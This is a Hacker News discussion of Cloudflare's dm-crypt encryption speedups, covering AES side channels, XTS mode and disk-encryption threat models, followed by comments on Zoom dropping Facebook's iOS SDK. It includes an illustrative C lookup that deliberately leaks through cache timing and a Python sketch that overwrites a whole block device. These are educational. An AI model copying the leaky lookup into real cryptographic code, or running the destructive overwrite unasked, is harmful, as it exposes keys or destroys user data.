> otherwise, we just forward the encryption request to the slower, generic C-based xts(ecb(aes-generic)) implementation

This seems like at least something of a bad idea, because that implementation (if my search-fu is correct) is:

https://github.com/torvalds/linux/blob/master/crypto/aes_gen...

Which is obviously not constant time, and will leak information through cache/timing sidechannels.

AES lends itself to a table based implementation which is simple, fairly fast, and-- unfortunately-- not secure if sidechannels matter. Fortunately, AES-NI eliminated most of the motivation for using such implementations on a vast collection of popular desktop hardware which has had AES-NI for quite a few years now.

For the sake of also being constructive, here is a constant time implementation in naive C for both AES encryption and decryption (the latter being somewhat hard to find, because stream modes only use the former):

https://github.com/bitcoin-core/ctaes

(sadly, being single-block-at-a-time and constant time without hardware acceleration has a significant performance cost! ... better could be done for XTS mode, as the above algorithm could run SIMD using SSE2-- it isn't implemented in that implementation because the intended use was CBC mode which can't be parallelized like that)
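
To make the cache side-channel concrete, here's a minimal standalone C illustration of the leaky pattern versus a constant-time lookup (illustrative; not taken from either linked implementation):

    #include <stdint.h>

    /* Leaky: which cache line gets touched depends on the secret byte, so a
     * co-resident attacker can learn bits of 'secret' by timing accesses. */
    uint8_t sbox_lookup_leaky(const uint8_t sbox[256], uint8_t secret)
    {
        return sbox[secret];  /* secret-dependent memory address */
    }

    /* Constant time: read every entry and keep the wanted one with a mask.
     * The access pattern no longer depends on the secret - and it is much
     * slower, which is exactly the performance cost mentioned above. */
    uint8_t sbox_lookup_ct(const uint8_t sbox[256], uint8_t secret)
    {
        uint8_t result = 0;
        for (unsigned i = 0; i < 256; i++) {
            uint8_t mask = (uint8_t)-(uint8_t)(i == secret); /* 0xFF iff i == secret */
            result |= sbox[i] & mask;
        }
        return result;
    }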

Can't the kernel AES-NI just be set up to save the FPU registers itself on the stack, if necessary?

nemo1618(3850) 3 days ago [-]

I wish the world could move on from AES. We have ciphers that are nearly as fast without requiring specialized hardware, just generic SIMD. Imagine how fast a ChaCha ASIC could run!

There are other options for non-AES FDE too: most infamously Speck (suspected to be compromised by the NSA), but also Adiantum, which is now in Linux 5.0.

harikb(3708) 3 days ago [-]

Curious why CF needs to worry about side-channel attacks when all software run on those machines belong to / written by them. They do have a "workers" product with 3rd party code but they can easily keep storage servers out of that pool. Typically storage encryption is all about what happens when a machine is physically stolen, hard disk discarded on failure or other such actions beyond network security. Please correct me if I am wrong.

nshepperd(10000) 3 days ago [-]

> Which is obviously not constant time, and will leak information through cache/timing sidechannels.

This confuses me. Why is it in the kernel if it's not constant time? Isn't that a security risk? (Is there any context where it would be safe to invoke this?)

gruez(3847) 3 days ago [-]

>Which is obviously not constant time, and will leak information through cache/timing sidechannels.

What's the threat model here? I can't think of a plausible scenario where side channel attacks can be used to gain unauthorized access to FDE contents.

beagle3(2793) 3 days ago [-]

Ages ago I benchmarked TrueCrypt overhead on my machine at the time (2006, I think?) and it was about 3%; I assumed that was a reasonable and still applicable number, also for dm-crypt and modern VeraCrypt. Guess I got gradually more wrong through those years, according to the git archeology...

singlow(4330) 3 days ago [-]

Also, disk speed in 2006 was probably much slower. Disks have gotten faster at a greater pace than processors during the last 10 years.

vletal(4131) 3 days ago [-]

Has anyone already tried to compile the kernel with these patches for their desktop/laptop with encrypted drive? https://github.com/cloudflare/linux/tree/master/patches

asymptotically2(10000) 3 days ago [-]

Yes, I'm running them on kernel 5.5.13 (which came out today)

tbrock(1925) 3 days ago [-]

Any chance of this patch making it to the mainline kernel?

saagarjha(10000) 3 days ago [-]

Not this one, specifically, but they've mentioned that they're working on upstreaming some derivative patches.

vbezhenar(3839) 3 days ago [-]

Offtopic, but why am I getting two scrollbars on this website? This is weird.

zackbloom(1428) 3 days ago [-]

Hi, I work on the Cloudflare Blog, we're working on deploying a fix now.

tyingq(4287) 3 days ago [-]

There is a scrollable div, the one that leads with:

grep -A 11 'xts(aes)' /proc/crypto

Is that what you mean?

tyingq(4287) 3 days ago [-]

The blog post reads like this all happened recently, but their linked post to the dm-crypt mailing list is from September 2017[1]. I'm curious if they've interacted with the dm-crypt people more recently.

[1]https://www.spinics.net/lists/dm-crypt/msg07516.html

mattst88(10000) 3 days ago [-]

Yeah, the time frame is somewhat unclear. The patch they link to in their tree is dated December 2019 however [1], so I assume this blog post is about stuff they've completed recently.

[1] https://github.com/cloudflare/linux/blob/master/patches/0023...

floatboth(4340) 3 days ago [-]

> Data encryption at rest is a must-have for any modern Internet company

What is it protecting against — data recovery from discarded old disks? Very stupid criminals breaking into the datacenter, powering servers off and stealing disks?

A breach in some web app would give the attacker access to a live system that has the encrypted disks already mounted...

eastdakota(1862) 3 days ago [-]

As we push further and further to the edge — closer and closer to every Internet user — the risk of a machine just walking away becomes higher and higher. As a result, we aim to build our servers with a similar mindset to how Apple builds iPhones — how can we ensure that secrets remain safe even if someone has physical access to the machines themselves. Ignat's work here is critical to us continuing to build our network to the furthest corners of the Internet. Stay tuned for more posts on how we use Trusted and Secure Boot, TPMs, signed packages, and much more to give us confidence to continue to expand Cloudflare's network.

zzzcpan(3749) 3 days ago [-]

On top of what others have said, it protects, for example, from governments of all the countries you have servers in and their law enforcement coming in and taking the servers, extracting keys for MITM, installing malware and backdoors, planting child porn on the servers, etc., and from staff of the various companies in various countries that maintain, deploy, or just have access to the infrastructure doing similar nasty things, and so on.

enitihas(3534) 3 days ago [-]

I think mostly against a breach in datacenter security. Most competent companies already have policies on how to deal with discarded old disks. The ones that don't might not be competent enough to use encryption at rest either.

It's all about layers of defenses.

mercora(4290) 3 days ago [-]

Being able to purge old disks confidently in a secure manner is an upside huge enough to make this statement true, in my opinion. There have been numerous incidents, even involving companies specializing in securely purging disks. If your data is encrypted there is basically nothing to do; you could even outright sell the disks from your DC or something. Just delete the keys/headers from the disk and you are safe.

It's also not possible to have data injected offline into your filesystem without having the keys. Without encryption, someone could just get the disk of the targeted server running somewhere and set their implants or what have you. When the server sees the disk back up, it looks just like a hiccup or something.

toolslive(10000) 3 days ago [-]

encrypted data at rest allows you to do an instant erase of the device.

derefr(3807) 3 days ago [-]

Yes, the former. You can't just put SSDs through a degausser!

netcoyote(10000) 3 days ago [-]

> criminals breaking into the datacenter, powering servers off and stealing disks?

Yes, exactly. A company I worked for had a hard drive pulled from a running server in a (third-party) data center that contained their game server binaries. Shortly afterwards a pirate company set up a business running "gray shards", with - no surprise - lower prices.

pmorici(2254) 3 days ago [-]

Interesting. One other thing they don't mention, which I found interesting when doing my own digging on dm-crypt speeds a while back, is that the 'cryptsetup benchmark' command only shows the single-core performance of each of those encryption algorithms. You can verify this by watching the processor load as it performs the benchmark. That led me to find that if you have a Linux software RAID, you can get much better performance by having one dm-crypt volume per disk and then software-RAIDing the dm devices, instead of putting a single dm-crypt on top of the software RAID. Curious if that would stack performance-wise with what they found here, or if that just happened to help with the queuing issue they identified.

mercora(4290) 3 days ago [-]

I remember somewhat recent efforts to parallelize the work of dm-crypt where applicable had been merged. However, I guess having multiple separate encryption parameters and states (read: disks) leaves more opportunity for parallelization of the work, especially if disk access patterns are not spread wide enough.

lidHanteyk(10000) 3 days ago [-]

As usual, Cloudflare wants to pretend that they are community players, but they aren't. If they weren't hypocrites, then they'd submit their patches like [0] for upstream review, but they haven't. (I searched LKML.) I understand the underlying desire, which is to avoid using a queue for CPU-bound work that could be done immediately, but there doesn't appear to have been any serious effort to coordinate with other Linux contributors to figure out a solution to the problem.

[0] https://github.com/cloudflare/linux/blob/master/patches/0024...

manigandham(779) 3 days ago [-]

They are submitting their work, after they put in even more work to make it more universally applicable to all Linux users. They also did try to engage with the community who basically told them that they didn't know how fast crypto should be.

Majromax(10000) 3 days ago [-]

The article discusses this in the conclusion:

> We are going to submit this work for inclusion in the main kernel source tree, but most likely not in its current form. Although the results look encouraging we have to remember that Linux is a highly portable operating system: it runs on powerful servers as well as small resource constrained IoT devices and on many other CPU architectures as well. The current version of the patches just optimises disk encryption for a particular workload on a particular architecture, but Linux needs a solution which runs smoothly everywhere.

That is, they think their current patch is too specialized for their own use-case to warrant inclusion in the mainline kernel without significant adaptation.

marcinzm(10000) 3 days ago [-]

>but there doesn't appear to have been any serious effort to coordinate with other Linux contributors to figure out a solution to the problem.

Well, when they reached out to the community they were told they were idiots and should f* off, in only somewhat nicer language. Then they were simply ignored.

When your community is toxic don't complain that people don't want to be part of it.

herpderperator(4119) 2 days ago [-]

> Unlike file system level encryption it encrypts all data on the disk including file metadata and even free space.

Anyone have a source on how full-disk (aka block-level) encryption encrypts free space? The only way I can imagine this working is by initially overwriting the entire disk with random data, so that you can't distinguish between encrypted data and true 'free space', i.e. on a brand new clean disk. Then, when a file (which, when written, would have been encrypted) is deleted (which by any conventional meaning of the word 'deleted' means the encrypted data is still present, but unallocated, and thus indistinguishable from the random data in step 1), does it get overwritten again with random data?

I would argue that overwriting an encrypted file with random data isn't really encrypting free space, but rather just overwriting the data, which already appeared random/encrypted. It is hardly any different to having a cleartext disk and overwriting deleted files with zeros, making them indistinguishable from actual free space.

dlgeek(2816) 2 days ago [-]

Debian does the first thing you discussed if you create an encrypted partition in the installer - it writes 0s through the crypto layer to fill the entire disk with encrypted data.
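
(A sketch of that approach, assuming a hypothetical opened mapping at /dev/mapper/cryptroot: writing zeros through the crypto layer leaves the underlying physical disk covered in ciphertext that is indistinguishable from random data. Destructive, requires root.)

    import os

    CHUNK = 4 * 1024 * 1024  # 4 MiB writes
    zeros = b"\x00" * CHUNK
    fd = os.open("/dev/mapper/cryptroot", os.O_WRONLY)
    try:
        while True:
            os.write(fd, zeros)   # zeros in, ciphertext out on the raw disk
    except OSError:
        pass                      # ENOSPC once the device is full
    finally:
        os.close(fd)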

koala_man(4312) 2 days ago [-]

The point of encrypting free space is just so you can't say how full the drive is.

This way, an attacker can't focus cracking on the fullest disk, match stolen backup disks to hosts based on non-sensitive health metrics, etc.

>The only way I can imagine this could happen is by overwriting the entire disk initially with random data

Traditionally, for speed, you'd write all zeroes to the encrypted volume (causing the physical volume to appear random), but yes

>Then, when a file (which, when written, would have been encrypted) is deleted

You'd just leave it. Crucially, you don't TRIM it.

>I would argue that overwriting an encrypted file with random data isn't really encrypting free space

Yup, that's why it's not done

unixhero(3904) 3 days ago [-]

Did they reach out to the Linux kernel mailing list, or just the dm-crypt team? I found the answer they received rather arrogant and useless, to be honest.

jlgaddis(3000) 3 days ago [-]

I'm a huge 'fan' of F/OSS but, unfortunately, such condescending answers are all too common in this 'community'.

est31(3611) 3 days ago [-]

Wow, those speed improvements are very neat, and an awesome blog post accompanying them. Prior to reading this, I considered Linux disk encryption to add negligible latency, because no HDD/SSD can outpace a CPU equipped with AES-NI, but that view has changed. Two questions: 1. Are there any efforts to upstream the patches? 2. Invoking non-hw-accelerated AES decryption routines sounds quite expensive. Has it been tried to save the FPU registers only when there is an actual need for decryption?

andyjpb(2927) 3 days ago [-]

The existing Linux system is useful for hardware that does less than 200MB/s, so you should be fine with HDDs.

Cloudflare is optimising for SSDs.

They don't talk about latency: all their crypto benchmarks measure throughput. Near the end they hint at response time for their overall cache system but there's no detailed discussion of latency issues.

The takeaway for me is that I'm OK with what's currently in Linux for the HDDs I use for my backups but I'd probably lose out if I encrypted my main SSD with LUKS.

At the end of the article they say that they're not going to upstream the patches as they are because they've only tested them with this one workload.

I'd also be interested to see a benchmark comparing SW AES with FPU-saving + HW AES. Unfortunately their post does not include stats for how often their proxy falls into the HW or SW implementations. Whatever those numbers are, I'd expect FPU-saving + HW AES to be somewhere in the middle.

knorker(10000) 3 days ago [-]

At least your first question is answered in the article: Yes

thereyougo(3076) 3 days ago [-]

>Being desperate we decided to seek support from the Internet and posted our findings to the dm-crypt mailing list

When I see a company such as CloudFlare being so transparent about their difficulties, and trying to find an answer using their community members, it makes me love them even more.

No ego, pure professionalism.

peterwwillis(2691) 3 days ago [-]

You won't know about their ego or professionalism until you work with them. Posting on a mailing list and making a blog post about it is not proof of either of these, it's brand marketing. They're trumpeting their engineering talent to build good will/nerd rep so people will love their company, spend money there, and apply for jobs. (But what it does show is that they're good at marketing, because it's working)

sneak(2447) 3 days ago [-]

Correspondingly, the response they received reflects just as strongly on the community itself.

thedance(10000) 3 days ago [-]

All this seems to me a series of very strong arguments for doing the crypto in your application.

saagarjha(10000) 3 days ago [-]

That would be even slower and more complex.

dependenttypes(10000) 3 days ago [-]

> one can only encrypt the whole disk with a single key

You can still use partitions.

> not all cryptographic algorithms can be used as the block layer doesn't have a high-level overview of the data anymore

I do not really understand this. Which cryptographic algorithms can't be used?

> Most common algorithms require some sort of block chaining to be secure

Nowadays I would say that, of these, only CTR is common, and it does not require chaining.

> Application and file system level encryption are usually the preferred choice for client systems because of the flexibility

One big issue with 'Application and file system level encryption' is that you often end up leaking metadata (such as the date edited, file name, file size, etc).

Regardless I think that this is a really nice article. I can't wait to try their patches on my laptop.

steerablesafe(10000) 3 days ago [-]

> One big issue with 'Application and file system level encryption' is that you often end up leaking metadata (such as the date edited, file name, file size, etc).

I wonder how cryfs stacks up in this regard.

https://www.cryfs.org

richardwhiuk(4339) 3 days ago [-]

> I do not really understand this. Which cryptographic algorithms can't be used?

CBC - which is one of the most common block cipher modes.

It's not clear to me whether GCM would work or not.

nemo1618(3850) 3 days ago [-]

> Which cryptographic algorithms can't be used?

You can't use any algorithm that requires O(n) IVs (e.g. a separate IV per disk sector), because there's nowhere to store the IVs. (Another consequence of this is that you can't store checksums anywhere, so you can't provide integrity checks.)

You can't use CTR mode either, because you'll end up reusing counter values. What do you do when you need to overwrite a block with new data?

XTS mode solves this, at least partially. Each sector is encrypted with an extra 'tweak' derived from the sector's position on disk, and unlike CTR it is not a plain keystream XOR, so overwriting a sector with new data does not cause the catastrophic leak that counter reuse would.

This isn't perfect, though, because it's still deterministic. If an attacker can see multiple states of the disk, they can tell when you revert a block to a previous state. But it's much better than other modes, especially since the main threat you want to protect against is your laptop getting stolen (in which case the attacker only sees a single state).
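
(A small illustration of that determinism, as a sketch using Python's `cryptography` package; this is not dm-crypt itself, but it is the same AES-XTS construction, with the tweak taken from the sector number.)

    import os
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    key = os.urandom(64)  # AES-256-XTS uses a double-length (512-bit) key

    def encrypt_sector(sector: int, plaintext: bytes) -> bytes:
        tweak = sector.to_bytes(16, "little")  # tweak derived from position
        enc = Cipher(algorithms.AES(key), modes.XTS(tweak)).encryptor()
        return enc.update(plaintext) + enc.finalize()

    block = b"A" * 512
    assert encrypt_sector(7, block) == encrypt_sector(7, block)  # same sector: same ciphertext
    assert encrypt_sector(7, block) != encrypt_sector(8, block)  # position changes ciphertext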

ggregoire(2275) 3 days ago [-]

> Many companies, however, don't encrypt their disks, because they fear the potential performance penalty caused by encryption overhead.

There is also the overhead of automatically unlocking a remote server during an unattended reboot. Reading the encryption password from a USB stick, or fetching it over the internet, is a no from me. I think there are solutions involving storing the password in RAM or in an unencrypted partition, but that's the overhead I'm talking about. I wonder how companies deal with that.

jlgaddis(3000) 3 days ago [-]

Red Hat's solution to this problem is NBDE.

> The Network-Bound Disk Encryption (NBDE) allows the user to encrypt root volumes of hard drives on physical and virtual machines without requiring to manually enter a password when systems are restarted. [0]

[0]: https://access.redhat.com/documentation/en-US/Red_Hat_Enterp...

r1ch(4022) 2 days ago [-]

Debian offers a dropbear shell in the initramfs, which you can use to SSH in and provide keys. I only have a handful of servers, so currently I do this manually on reboot, but it would not be difficult to automate using, for example, SSH keys unlocking key material. The downside of this is that your initramfs and kernel are on an unencrypted disk, so a physical attacker could feasibly backdoor them. I'm sure there's some secure boot UEFI/TPM solution here.

gruez(3847) 3 days ago [-]

Isn't this what TPMs are designed for? I think both Intel and AMD motherboards have them built in, via the security processor in the CPU.

mercora(4290) 3 days ago [-]

I use kexec for reboots and store the keys for the disks inside an initramfs, which itself is stored on an encrypted boot partition. When I do a cold boot, these systems boot into a recovery-like OS so I can fix stuff when needed, but mainly to do a kexec from there (it's not perfect, but what is). If it's possible to avoid this (i.e. I have physical access), I can decrypt the initramfs directly from GRUB using a passphrase entered locally.

A warm reboot using kexec does not need any intervention from my side; it boots directly into the already-decrypted initramfs with the key present, and is thus able to mount the encrypted volumes, including the root volume.

LinuxBender(142) 3 days ago [-]

Does CloudFlare plan to get their kernel patches merged upstream?

yalooze(4298) 3 days ago [-]

Second to last paragraph:

> We are going to submit this work for inclusion in the main kernel source tree, but most likely not in its current form. Although the results look encouraging we have to remember that Linux is a highly portable operating system: it runs on powerful servers as well as small resource constrained IoT devices and on many other CPU architectures as well. The current version of the patches just optimises disk encryption for a particular workload on a particular architecture, but Linux needs a solution which runs smoothly everywhere.




(469) Zoom's Use of Facebook's SDK in iOS Client

469 points about 13 hours ago by patrickyevsukov in 10000th position

blog.zoom.us | Estimated reading time – 2 minutes | comments | anchor

Zoom's Use of Facebook's SDK in iOS Client

Zoom takes its users' privacy extremely seriously. We would like to share a change that we have made regarding the use of Facebook's SDK.

We originally implemented the "Login with Facebook" feature using the Facebook SDK for iOS (Software Development Kit) in order to provide our users with another convenient way to access our platform. However, we were made aware on Wednesday, March 25, 2020, that the Facebook SDK was collecting device information unnecessary for us to provide our services. The information collected by the Facebook SDK did not include information and activities related to meetings such as attendees, names, notes, etc., but rather included information about devices such as the mobile OS type and version, the device time zone, device OS, device model and carrier, screen size, processor cores, and disk space.

Our customers' privacy is incredibly important to us, and therefore we decided to remove the Facebook SDK in our iOS client and have reconfigured the feature so that users will still be able to log in with Facebook via their browser. Users will need to update to the latest version of our application, available as of 2:30 p.m. Pacific time on Friday, March 27, 2020, in order for these changes to take hold, and we strongly encourage them to do so.

Example information sent by the SDK on installation and application open and close:

  • Application Bundle Identifier
  • Application Instance ID
  • Application Version
  • Device Carrier
  • iOS Advertiser ID
  • iOS Device CPU Cores
  • iOS Device Disk Space Available
  • iOS Device Disk Space Remaining
  • iOS Device Display Dimensions
  • iOS Device Model
  • iOS Language
  • iOS Timezone
  • iOS Version
  • IP Address

We would like to thank Joseph Cox from Motherboard for bringing this to our attention here.

We sincerely apologize for the concern this has caused, and remain firmly committed to the protection of our users' privacy. We are reviewing our process and protocols for implementing these features in the future to ensure this does not happen again.




All Comments: [-] | anchor

Executor(10000) about 11 hours ago [-]

Archive link to not give anti-white Vice ad money: https://web.archive.org/web/20200328020512/https://www.vice.....

exhilaration(10000) about 11 hours ago [-]

anti-white? can you explain?

intopieces(4339) about 12 hours ago [-]

I'd like this to be independently verified. There were a lot of comments on the other threads that 'Of course Zoom was sending data to Facebook' because they're using Facebook's SDK. It made it seem like such data leaks were inevitable, when apparently they aren't.

mroche(3504) about 12 hours ago [-]

From the article:

> Motherboard downloaded the update and verified that it does not send data to Facebook upon opening.

Edit: Fixing mental hiccup, nothing to see here.

greggman3(10000) about 1 hour ago [-]

I'm happy that Zoom doesn't want to help Facebook spy on me. Unfortunately the chosen solution is still a privacy nightmare. Basically they let you log in to Facebook via an in-app browser. The problem is that an app can spy on all activity in an in-app browser. That means you have to trust that Zoom is not recording your Facebook password as you type it in. We need a better system.

Also scary: I have never logged in to Facebook on my iPhone except via the Facebook app, and this was the first time I've installed Zoom. When I went into the Zoom app and picked login via Facebook, somehow it knew who I was and asked if I wanted to log in as me. How is this possible? Is iOS sharing cookies across apps? I feel like maybe I need to reset my phone. WTF

I also feel like the best solution for this case is to somehow log in via the Facebook app. I know that used to be an option, but it seems Facebook deprecated it. My argument would be (a) I don't have to worry that Zoom (or any other app) is getting my Facebook credentials, and (b) if I actually do want to log in via Facebook, it's almost guaranteed I have the app installed.

codesternews(2667) 29 minutes ago [-]

Not on iOS. If they are using a web view or SFSafariViewController, they cannot access the browser cookies or data, or most device information.

generalpf(10000) 15 minutes ago [-]

If they're using ASWebAuthenticationSession you can't read passwords. You can't even see which URL they're on.

mkchoi212(4323) about 10 hours ago [-]

It is ridiculous that a company as big as Zoom wouldn't know what an API they're using is doing with their customers' data. Is there not a legal/privacy team at Zoom that is in charge of reading all the fine print and license agreements??

xiphias2(10000) about 10 hours ago [-]

I guess you haven't worked at a big company yet.

For me this would be much stranger at a tiny company.

mikenew(3957) about 10 hours ago [-]

So it sounds like Zoom was using the Facebook SDK, and now they're not.

I've been an iOS developer for a long time. I can tell you from experience that everyone does this. I have never worked for anyone who didn't ask for their app to include some combination of Facebook, Google, Flurry, AppCenter, Segment, Intercom, Parse, or whatever other random analytics framework the PM happens to be infatuated with.

Getting mad at Zoom for using the Facebook SDK is missing the point. They and a million others are always going to be doing this. Get mad at Apple for not letting you wireshark your own iPhone. Or having no way to package open source software where you can actually see what's running. As long as you're running binary blobs that can make whatever network connections they please, people are going to take your data and send it to places you don't know about.

Yeah maybe you can pass laws about it. But is that really a great solution? Who audits that? How do you determine what's legal and what's not? We should be pushing for a platform that makes it obvious what the software you're running is up to. The random pitchfork crusade against whatever company happens to catch a bad news cycle just isn't going to get us anywhere.

_trampeltier(4340) about 5 hours ago [-]

But there could be a law: apps have to have an option to write all telemetry data to a text file.

tbodt(2683) about 6 hours ago [-]

Get mad at Facebook for stuffing analytics into their login button library

crtlaltdel(4179) about 9 hours ago [-]

Yeah, same here; on web and mobile this is super common. I just went through this with a PM.

rpastuszak(4338) about 4 hours ago [-]

> As long as you're running binary blobs that can make whatever network connections they please, people are going to take your data and send it to places you don't know about.

PWAs could answer this problem, at least to some extent, but Apple historically has been limiting the features to protect the AppStore and the Apple Tax (v. the recent local persistence changes in ITP).

It's better than, say, Google pretending that third-party cookies make the web a safer place (yup, that happened).

(Don't get me wrong, I think ITP and Safari are great)

> Get mad at Apple for not letting you wireshark your own iPhone.

People on HN can, but an average user shouldn't have to care about that. I'm 100% up for stronger legislative measures (both tech and dark UX patterns) and more education in this area. Sounds boring, but without it we'll just keep running in circles.

PrettyPastry(10000) 39 minutes ago [-]

You can listen to the iPhone with Wireshark by using OWASP ZAP as a proxy.

StreamBright(2810) about 4 hours ago [-]

>> I can tell you from experience that everyone does this.

This is not true and even if it was true it is an extremely lame argument. You can justify pretty much everything with this logic.

jka(4309) about 3 hours ago [-]

When you say 'everyone' in your second paragraph, really you mean 'all of the Silicon Valley style employers I'm aware of'.

That's a tiny proportion of the user population, and it doesn't imply agreement or consent to the information the Facebook SDK shares. And even if it did, it wouldn't automatically mean that it's acceptable or good behaviour by those apps and Facebook.

Bringing widely-distributed privacy breaches to a wider audience's attention can help those users provide feedback regarding products and then allow them to select vendors who respect their values.

m463(10000) 28 minutes ago [-]

Nice to see someone who gets it.

Apple gives you no way to find what your phone is doing, and no way to prevent it from doing it.

They provide company sponsored 'controls' on what apps can do, which is about as useful as a factory alarm on a mid-80's car. Except with a modern twist, where they're the only ones capable of installing an alarm. (and imagine the alarm gives a free pass to apple)

The fact that they're starting in on MacOS and Little Snitch makes me think their platform isn't long for the world.

sigh. I do like arch linux.

Angostura(3775) about 5 hours ago [-]

> Getting mad at Zoom for using the Facebook SDK is missing the point. They and a million others are always going to be doing this. Get mad at Apple for not letting you wireshark your own iPhone.

But you've just said everyone does it and we shouldn't get mad at them - so we don't need wireshark, because it would simply confirm that everyone does it and we shouldn't get mad at them - right?

aaronbrager(4188) about 10 hours ago [-]

You can pretty easily see all the traffic on your own phone. You can even do it on device

https://apps.apple.com/us/app/charles-proxy/id1134218562

designcode(10000) about 10 hours ago [-]

You can easily see all traffic on your device, try Charles proxy.

intopieces(4339) about 10 hours ago [-]

>Getting mad at Zoom for using the Facebook SDK is missing the point.

It's really hard to believe this point given that... getting mad seems to have worked.

anyfoo(3731) about 7 hours ago [-]

Of course passing laws about that is a great solution. This is how society defines what is and what isn't acceptable behavior for corporations. Are you also typing up rallying paragraphs against laws that dictate how companies have to adhere to food safety? Would your suggestion then be to "get mad at Burger King for not allowing you to perform chemical tests in the restaurant"? "Everyone does it", like everyone used asbestos and lead pipes in the past?

angrygoat(2940) about 7 hours ago [-]

You obviously need be a highly technical user, but it ought to be fairly easy for most people here to run a packet capture on their phone: https://developer.apple.com/documentation/network/recording_...

nexuist(4119) about 9 hours ago [-]

I don't want to live in a world where my parents and grandparents are expected to pull up Wireshark to figure out if the app they're using will record their front camera without consent.

Blaming Zoom and FB is entirely acceptable here, it is their responsibility to keep my data private.

Blaming Apple? Why, when Zoom is on the Play Store as well?

https://play.google.com/store/apps/details?id=us.zoom.videom...

>As long as you're running binary blobs that can make whatever network connections they please, people are going to take your data and send it to places you don't know about.

Surely there are open source video chat solutions already? They haven't taken off for one simple reason: video hosting is expensive. It's quite literally one of the most intensive network activities you can partake in, rivaling torrenting.

It doesn't make sense economically to offer a video hosting platform without collecting income from it. Nor does it make sense to attempt a peer-to-peer solution knowing full well that one laggy peer wrecks the experience for everyone else.

It's a very hard problem.

Causality1(10000) about 7 hours ago [-]

Constantly having to be in a war against my own phone's operating system is exhausting. These days I absolutely refuse to buy any brand that makes me jump through hoops just to get root on my own silicon.

jtdev(4293) about 1 hour ago [-]

Don't blame the drunk driver, blame the auto manufacturer...

hyko(10000) about 7 hours ago [-]

Yes, we need laws against this and for the gatekeepers to be the enforcers. I used to think that individual choice would solve these problems, but it won't. Zoom et al are growing like a weed and we can't protect all our loved ones from this bullshit with individual action all of the time. There are some problems that require government action; I think the events of this year have demonstrated that clearly. Individually we are weak as water, but collectively we are embarrassingly powerful. Time to organise.

hamburglar(10000) about 5 hours ago [-]

I'm really liking Zoom's responses to incidents lately. Both this and the 'oops we implemented certain features by leaving a localhost webserver gaping open' fiasco fairly recently got extremely nimble responses from them, and the responses were absolutely the right thing to do. They could have hand-waved the http server away and claimed to have 'secured' it, and they could have hand-waved this away as 'standard practice', which, let's be frank, it almost certainly is. The fact that they understood the seriousness and swiftly yanked the features in both instances is HUGE. Kudos to them for this.

edit: some people won't want to give them any slack because they committed the offenses in the first place, but I think that's silly. Reward them for trying, because if this is the way they're going to respond to blowing it, they're one of the good guys.

marta_morena_23(10000) about 9 hours ago [-]

Baffling how this can be the top post...

'Who audits that?' We just did. And if there were a law against this, Zoom would just have been exposed for breaking it. Any sane company will try its best to adhere to laws. Some big players like Google can afford to mess around and pay a few billion in fines, but those are the exceptions, not the rule. Eventually, even they can't afford the fines in the long run (even Google bowed to GDPR, or at least it's getting hit with steeper fines until it wakes up).

'How do you determine what's legal and what's not?' You pass a law, then read the law? This is a self-contradiction. Laws are open to interpretation, but the interpretation is quite clear after a supreme court case (for better or worse).

'We should be pushing for a platform that makes it obvious what the software you're running is up to.' Oh, the web of trust? Did you ever install Little Snitch or some other firewall on your system? It's utterly hopeless even if you are knowledgeable. There is simply no way to audit that. 'Who audits that?' Here you CAN ask this question.

I can't for the life of me understand how you can believe it is better for everyone, including parents and grandparents, to audit their own phones, instead of having researchers audit phones and report companies that break the law. This is nonsensical. You must either be some expert without a connection to the real world, or some elitist who thinks everyone is like him.

peteretep(1718) about 6 hours ago [-]

> Who audits that?

I'd like to see Apple launch their own telemetry/events framework, that users can examine the data from, and then cut off everyone else

HenryBemis(4292) about 1 hour ago [-]

Hello fellow iOS developer. I have two apps on the Apple store. I never used any external SDKs/libraries, only the built-in Xcode ones. I preferred to spend a bit more time writing/testing, but I would never accept that FB and other scum (from a privacy standpoint) track children (I wrote the apps for my nephews and nieces and put them in the Apple store just for them) (I don't advertise them at all and I won't do so here either).

Regarding the issue that started this Zoom-FB dialogue, I have commented a dozen (or more) times on the necessity of a firewalled phone, where the user (who unfortunately needs basic knowledge of firewall administration) can decide what to allow and what to block. Your point on who audits is valid (I have been a CISA and CISM for many years), and, well, nobody does. Each user will have to do their own work to keep their family clear of this scum.

pixelrevision(4340) less than a minute ago [-]

Another problem is these analytics platforms just keep getting worse. There used to be a lot of effort put in to not collecting any personally identifiable info. Hell even google analytics was strict about that. It also took time to integrate them.

Now almost all the packages grab identifiable info by default, and some are doing things like making screen recordings. Combine that with a rotating set of product owners, as described above, and a lot of apps just end up making way too many calls to way too many places.

And I do think Apple could and should be doing something more here. Their developer analytics setup is a good example to lead by as it gives users a global option to opt out. They also are able to reject apps for an icon being offbrand so I'm pretty sure they could figure out something here.

saagarjha(10000) about 8 hours ago [-]

> Getting mad at Zoom for using the Facebook SDK is missing the point. They and a million others are always going to be doing this. Get mad at Apple for not letting you wireshark your own iPhone.

There's plenty of anger to go around. Get mad at all three: Facebook for making an SDK that tracks you, Zoom for integrating it, and Apple for letting it through unencumbered.

yingw787(3944) about 11 hours ago [-]

I love $ZM, it works when nothing else does, and it's responsive to user feedback and cares about user happiness. Most of the interactions I have today are through $ZM and my life would be cut off almost entirely if $ZM didn't exist. If I'm fortunate enough to run a company, I would love to have a business relationship with $ZM, and I'll remember all this.

No, I'm not a paid shill, just a really tired and stressed out guy who gets almost all of his social interaction through Zoom.

bunchOfCucks(10000) about 10 hours ago [-]

$OK

ccktlmazeltov(10000) about 12 hours ago [-]

And so zoom crumbled from the social pressure, while every other service and website is thinking 'oof, they didn't realize that everybody does this to do advertising'

floatingatoll(4062) about 11 hours ago [-]

It's also possible they didn't listen to their app over the wire and see it doing this. What lesson could we teach about 'why you should mitmproxy your app while it's in development?', so that people can start uncovering this in other apps — including their own?
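
(One hedged sketch of what that could look like: a tiny mitmproxy addon that logs every host an app contacts, so third-party beacons stand out immediately. Save as log_hosts.py and run `mitmproxy -s log_hosts.py`, with the device pointed at the proxy.)

    from mitmproxy import http

    seen = set()

    def request(flow: http.HTTPFlow) -> None:
        # Print each distinct host the app talks to, exactly once.
        host = flow.request.pretty_host
        if host not in seen:
            seen.add(host)
            print("new host contacted:", host)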

thulecitizen(10000) about 11 hours ago [-]

Sometimes I really wonder who is on hackernews that stuff like this gets downvoted. Apparently a healthy dose of (scientific) skepticism means one is being 'rude' in SV circles. I guess the intellectual-property-rentier industrial complex that is Silicon Valley doesn't like people looking behind the curtains.

pixiemaster(10000) about 7 hours ago [-]

here, take my gold

jscholes(2970) about 12 hours ago [-]

